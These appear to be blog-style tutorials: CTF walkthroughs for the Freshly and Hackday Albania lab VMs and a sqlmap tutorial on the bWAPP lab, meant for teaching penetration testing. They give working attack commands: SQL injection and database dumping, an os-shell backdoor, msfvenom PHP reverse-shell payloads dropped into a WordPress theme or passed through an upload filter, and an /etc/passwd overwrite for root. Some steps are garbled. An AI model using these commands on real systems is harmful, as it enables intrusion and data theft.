Hack the Freshly VM (CTF Challenge)

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab… let’s get started with it and access it.
Download from here


So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in terminal of Kali. It will show each IP present in our network.


TARGET IP : 192.168.1.6

Now we have target IP so let’s scan it with aggressive scan (-A).
nmap -p-  -A 192.168.1.6


This shows all open ports: 80, 8080, 443.
As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.


Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:


After scanning it shows that there is a login.php page found. So open it in a browser with target IP


As we can see there is a login form popped up as a result asking for user and password. So we will capture the cookies using burpsuite. I have given the entries for user as admin and password as 123. You can enter anything you like


I take these parameters and run sqlmap to see if there's SQLInjection vulnerability we will find it in its Database using sqlmap. And for this type:

Sqlmap –u “http://192.168.1.6/login.php” --data=”user=test&password=123&s=Submit” --risk 3 -- level 3 --dbs


We have our required database right in front of us. Using sql commands fetch username and password from that database ie wordpress8080


Alright we have achieved our first step by finding out user and password for wordpress.

User = admin
Password = SuperSecretPassword

Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080

Cool...See what you have got…. Now click on this link and you are all set for further result.


Candy goodness!!!!!  It’s our wordpress page. So let’s get on to other step by opening wordpress login page and entering the credentials we found out i.e.
User= admin
Password= SuperSecretPassword


Once you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 –f raw


Side by side in other terminal open metasploit and run handler.

Use exploit/multi/handler
Set payload php/meterpreter/reverse_tcp
Set lhost 192.168.1.6
Set lport 4444
exploit


Again going back to our generated php raw file copy the code from to die().

As we want to read a file on the system, let's put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it,


But we are not done yet as the exploit will run it will give you the session of meterpreter. Furthermore type, shell

Now we need to import the python file to reach the terminal and to do so type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type;

lsb_release a


When we reload the index page we got the /etc/shadow file in the footer:  We already got the flag! No need to root the system But how did you get root shell, you might ask: ) Here's the magic:

Account credential reuse from the Wordpress admin password SuperSecretPassword allowed su - to escalate privileges


Great!!!! You have achieved your goal. Though this was a easy challenge I hope it helped you to improve your skills.

Database Penetration Testing using Sqlmap

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Ø  Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
Ø  Enumerate users, password hashes, privileges, roles, databases, tables and columns.
Ø  Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Ø  Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
Ø  Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

For more details visit their official site sqlmap.org

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:
Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.


Type any name of movie in the text field and just after that start the burp suite in kali Linux.


To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.


Open the terminal in kali Linux and type the sqlmap command.
From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs


This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –tables


Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.
I want to know columns details of blog table using above as I have got it as you can see in image given below.
sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –T blog --columns


This command fetches all columns of blog table. It shows there are 4 columns with their data types.


To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp –T blog –C date,entry,id,owner –dump


Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –T users –columns


We have got all columns of users table with their data types.


Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T users –C id,emails,login,password,secret –dump

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.
sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T movies –columns


In same way this tool has fetched all columns with their data types under movie table.


Again I want to penetrate its column so I will use same command by modifying its table name.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T movies –C genre,id,imdb,main_character,release_year,tickets_stock,title --dump


Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.


Once again repeat the whole process for table heroes.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T heroes --columns


We have 4 columns with their data types.


For more information repeat the process which will dump details under its columns.
sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes -C id,login,password,secret --dump


We have got id, login, password and secret entries. Read the details from table.


Again repeat the same process for our last table which is visitors.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors –columns


Table visitors are also having 4 columns with its data types.


Let’s penetrate its columns also

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors -C date,id,ip_address,user_agent –dump


Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.


We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp --os-shell


Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.


Awesome!!!  We got the shell.
os-shell> net users

Hack the Hackday Albania VM (CTF Challenge)

This was used in HackDay Albania's 2016 CTF. It uses DHCP.

Note: VMware users may have issues with the network interface doing down by default. You are recommended to use Virtualbox.

Download the lab from: https://www.vulnhub.com/entry/hackday-albania,167/

Let’s begin. First we run netdiscover(as usual).


netdiscover


Next we run nmap
nmap -p- A 192.168.0.103


Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting http://192.168.0.103:8008


The message in the box translates to- “if I am, I know where to go :)”
We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here :)”
Next we run nikto on our target
nikto -h 192.168.0.103:8008


Upon discovering the existence of robots.txt, we open it up on our browser


All but one directory give us the same result.


The directory that proves to be worth visiting is http://192.168.0.103:8008/unisxcudkqjydw/


So, we discover another useful directory. Lets head towards it


Clicking on the client/ directory, we are greeted by a login page of very secure bank


Upon trying a single ‘as the username, we get an error page.


After trying multiple credentials, we finally succeed in logging in as the first user
‘ or ‘a’ = ‘a’ --
#


On the welcome page, we can find an option to upload a file. Let us create a php payload using msfvenom and try uploading it.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw


We copy the php code and save it on a leafpad and save it in the name ra.php We try to upload the file but the webpage displays an error- “After we got hackedwe are allowing only image filesto upload such as jpg,jpeg, bmp etc…” Let’s rename our file to ra.jpg and try uploading it again.


Start the msf handler.
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit


Now we click on view ticket option under ra.jpg on our browser


And we have our meterpreter session. To get a proper shell and reach the tmp folder and find the os release, we fire up the following commands:
shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”);’
cd /tmp
lsb_release -a


Kernel exploits do not seem to work here since gcc is not installed on our target machine. So, we decide to go the other way. We download a shell called LinEnum.sh from github on another terminal using-

git clone https://github.com/rebootuser/LinEnum.git
Thereafter we start apache service on our machine

service apache2 start

Thereafter, we copy the LinEnum.sh file to var/www/html folder of our machine and returning to our victim’s shell, we upload the file to his tmp folder

wget http://192.168.1.106/LinEnum.sh
Thereafter, change the permission of the uploaded file and run it.
chmod 777 LinEnum.sh
./LinEnum.sh


We discover that etc/passwd folder is writable.


And the encryption used by our victim’s machine is SHA512


We open the victim’s password file on the terminal itself
cat /etc/passwd


We then copy the entire contents of the file and copy it to a leafpad and name it as passwd. To know more about etc/passwd, please visit https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/ or https://www.digitalocean.com/community/tutorials/how-to-use-passwd-and-adduser-to-manage-passwords-on-a-linux-vps
Thereafter on another terminal, we generate a SHA512 encryption for a password “raj”
python -c 'import crypt; print crypt.crypt("raj", "$6$saltsalt$")'


We now copy this hash and replace it with the ‘x’ in the last line of our passwd file which we just saved in leafpad.


Next, we place this file named passwd in the var/www/html folder of our machine and upload it to the victim’s tmp folder


Now copy and replace this file with the passwd file present inside the etc folder.
cp passwd /etc/passwd

Then we try logging in with the user taviso
su taviso
raj

Next we try the root’s login
sudo -i
raj

Success. Now list the contents
ls

here’s our flag. Read its contents using
cat flag.txt